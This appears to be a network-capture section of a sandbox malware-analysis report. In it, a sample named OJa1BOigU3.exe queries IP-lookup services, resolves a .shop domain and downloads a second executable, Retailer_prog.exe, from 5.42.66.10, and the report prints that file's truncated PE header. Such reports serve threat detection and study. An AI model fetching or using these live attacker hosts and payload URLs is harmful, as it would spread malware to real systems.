May 6, 2024 07:53:14.689048052 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689052105 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689062119 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689065933 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689073086 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689080000 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689090014 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689093113 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689100027 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689109087 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689116955 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689136982 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689155102 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689167976 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689167976 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689182043 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689193964 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689199924 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689205885 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689218998 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689227104 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689229965 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689243078 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689251900 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689254999 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689266920 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689270020 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689280033 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689292908 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689301014 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689306974 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689320087 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689321995 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689335108 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689338923 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689349890 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689358950 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689363003 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689376116 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689382076 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689388990 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689399958 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689403057 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689428091 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689450979 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689477921 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689491034 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689502001 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689512968 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689524889 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689524889 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689563036 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689574957 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689615011 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689626932 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689636946 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689650059 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689682961 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689682961 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689693928 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689711094 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689723015 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689735889 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689743996 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689749956 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689764023 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689789057 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689805031 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689816952 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689829111 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689840078 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689841032 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689852953 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689866066 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689871073 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689877987 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689893961 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689905882 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689907074 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689918041 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689918041 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689933062 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689944029 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689944029 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689960003 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689973116 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.689974070 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689986944 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.689997911 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690000057 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690006971 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690011024 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690023899 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690035105 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690037966 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690051079 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690058947 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690064907 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690072060 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690078974 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690090895 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690103054 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690123081 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690124035 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690136909 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690148115 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690156937 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690160990 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690174103 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690181971 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690186024 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690198898 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690198898 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690221071 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690248013 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690248013 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690262079 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690277100 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690288067 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690299034 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690299034 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690303087 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690315008 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690320969 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690327883 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690339088 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690351009 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690352917 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690352917 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690363884 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690376043 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690377951 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690387964 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690397978 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690402031 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690408945 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690414906 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690427065 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690427065 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690439939 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690447092 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690453053 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.690468073 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690476894 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.690489054 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.694581032 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.694724083 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.806194067 CEST	443	49744	104.21.30.191	192.168.2.4
May 6, 2024 07:53:14.806260109 CEST	443	49744	104.21.30.191	192.168.2.4
May 6, 2024 07:53:14.806349993 CEST	49744	443	192.168.2.4	104.21.30.191
May 6, 2024 07:53:14.806657076 CEST	49744	443	192.168.2.4	104.21.30.191
May 6, 2024 07:53:14.806673050 CEST	443	49744	104.21.30.191	192.168.2.4
May 6, 2024 07:53:14.806683064 CEST	49744	443	192.168.2.4	104.21.30.191
May 6, 2024 07:53:14.806695938 CEST	443	49744	104.21.30.191	192.168.2.4
May 6, 2024 07:53:14.809211016 CEST	49745	443	192.168.2.4	104.21.30.191
May 6, 2024 07:53:14.809237957 CEST	443	49745	104.21.30.191	192.168.2.4
May 6, 2024 07:53:14.809416056 CEST	49745	443	192.168.2.4	104.21.30.191
May 6, 2024 07:53:14.809673071 CEST	49745	443	192.168.2.4	104.21.30.191
May 6, 2024 07:53:14.809685946 CEST	443	49745	104.21.30.191	192.168.2.4
May 6, 2024 07:53:14.947066069 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947083950 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947105885 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947118998 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947133064 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947145939 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947160959 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947174072 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947204113 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947217941 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947231054 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947243929 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947318077 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947333097 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947334051 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947346926 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947362900 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947369099 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947377920 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947380066 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947391987 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947402000 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947418928 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947421074 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947436094 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947441101 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947449923 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947462082 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947463989 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947474003 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947484970 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947493076 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947499037 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947506905 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947513103 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947526932 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947526932 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947540998 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947541952 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947560072 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947561026 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947570086 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947577000 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947588921 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947592020 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947602034 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947606087 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947619915 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947621107 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947637081 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947649002 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947659969 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947666883 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947674990 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947689056 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947707891 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947714090 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947722912 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947731018 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947737932 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947751999 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947752953 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947763920 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947767973 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947782040 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947782993 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947798014 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947798014 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947813034 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947817087 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947828054 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947832108 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947843075 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947849989 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947864056 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947865963 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947881937 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947890997 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947897911 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947916031 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947921991 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947933912 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947946072 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947957993 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947959900 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947972059 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.947976112 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947990894 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.947990894 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.948002100 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.948009014 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.948019981 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.948023081 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.948031902 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.948041916 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.948052883 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.948056936 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.948065042 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.948071957 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.948082924 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.948085070 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.948096037 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.948105097 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.948112965 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.948120117 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.948137999 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.948142052 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.948156118 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.948156118 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.948170900 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.948179007 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.948187113 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.948193073 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.948201895 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.948213100 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.948216915 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.948224068 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.948232889 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.948242903 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.948254108 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.948254108 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.948268890 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.948276043 CEST	49743	80	192.168.2.4	193.233.132.253

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 6, 2024 07:52:31.448553085 CEST	192.168.2.4	1.1.1.1	0xcf38	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
May 6, 2024 07:52:32.081836939 CEST	192.168.2.4	1.1.1.1	0x77f	Standard query (0)	db-ip.com	A (IP address)	IN (0x0001)	false
May 6, 2024 07:53:13.843816996 CEST	192.168.2.4	1.1.1.1	0x559e	Standard query (0)	miniaturefinerninewjs.shop	A (IP address)	IN (0x0001)	false
May 6, 2024 07:54:27.930341959 CEST	192.168.2.4	1.1.1.1	0xa1fd	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
May 6, 2024 07:52:31.558084965 CEST	1.1.1.1	192.168.2.4	0xcf38	No error (0)	ipinfo.io	34.117.186.192	A (IP address)	IN (0x0001)	false
May 6, 2024 07:52:32.192706108 CEST	1.1.1.1	192.168.2.4	0x77f	No error (0)	db-ip.com	104.26.5.15	A (IP address)	IN (0x0001)	false
May 6, 2024 07:52:32.192706108 CEST	1.1.1.1	192.168.2.4	0x77f	No error (0)	db-ip.com	104.26.4.15	A (IP address)	IN (0x0001)	false
May 6, 2024 07:52:32.192706108 CEST	1.1.1.1	192.168.2.4	0x77f	No error (0)	db-ip.com	172.67.75.166	A (IP address)	IN (0x0001)	false
May 6, 2024 07:53:13.959146976 CEST	1.1.1.1	192.168.2.4	0x559e	No error (0)	miniaturefinerninewjs.shop	104.21.30.191	A (IP address)	IN (0x0001)	false
May 6, 2024 07:53:13.959146976 CEST	1.1.1.1	192.168.2.4	0x559e	No error (0)	miniaturefinerninewjs.shop	172.67.173.139	A (IP address)	IN (0x0001)	false
May 6, 2024 07:54:28.039844990 CEST	1.1.1.1	192.168.2.4	0xa1fd	No error (0)	ipinfo.io	34.117.186.192	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49741	5.42.66.10	80	1804	C:\Users\user\Desktop\OJa1BOigU3.exe

Timestamp	Bytes transferred	Direction	Data
May 6, 2024 07:53:01.721796036 CEST	234	OUT	HEAD /download/th/Retailer_prog.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 5.42.66.10 Cache-Control: no-cache
May 6, 2024 07:53:01.974927902 CEST	275	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:01 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Sun, 05 May 2024 10:02:05 GMT ETag: "6aab18-617b20b900396" Accept-Ranges: bytes Content-Length: 6990616 Content-Type: application/x-msdownload
May 6, 2024 07:53:01.978513956 CEST	233	OUT	GET /download/th/Retailer_prog.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 5.42.66.10 Cache-Control: no-cache
May 6, 2024 07:53:02.233366013 CEST	1289	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:02 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Sun, 05 May 2024 10:02:05 GMT ETag: "6aab18-617b20b900396" Accept-Ranges: bytes Content-Length: 6990616 Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 ca 39 36 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 bc 15 00 00 3e 17 00 00 00 00 00 a3 8c a4 00 00 10 00 00 00 d0 15 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 b9 00 00 04 00 00 41 5d 6b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 55 4f 00 40 01 00 00 00 a0 ab 00 0e 5f 0d 00 00 00 00 00 00 00 00 00 00 4a 6a 00 18 61 00 00 00 80 ab 00 d0 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 4b a1 00 18 00 00 00 90 67 ab 00 40 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL96f'>@A]k@PUO@_JjaKg@N@.text `.rdata2~@@.data0IP@.vmp5 `.vmp,N@.vmp@\N\ `.reloc\@@.rsrc_`\@@ [TRUNCATED]
